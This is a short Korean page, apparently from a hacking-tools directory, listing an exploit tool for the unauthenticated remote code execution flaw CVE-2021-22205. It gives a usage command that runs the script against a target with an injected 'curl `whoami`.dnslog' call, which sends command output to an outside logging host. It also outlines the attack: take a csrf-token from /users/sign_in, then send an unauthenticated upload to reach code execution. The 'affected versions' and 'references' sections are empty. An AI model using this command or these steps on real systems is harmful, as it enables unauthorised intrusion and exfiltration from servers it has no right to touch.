해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!
CVE-2021-22205 비인가 RCE
커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.
모든 도구 탐색
도구 컬렉션을 둘러보세요
영향받는 버전:
사용법
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
csrf-token 획득:
/users/sign_in을 통해 csrf-token을 획득한 후 앞선 CVE-2021-22205 poc를 사용하여 업로드 패킷을 구성하고 인증되지 않은 업로드 요청을 실행하여 최종적으로 rce를 달성합니다.
참고: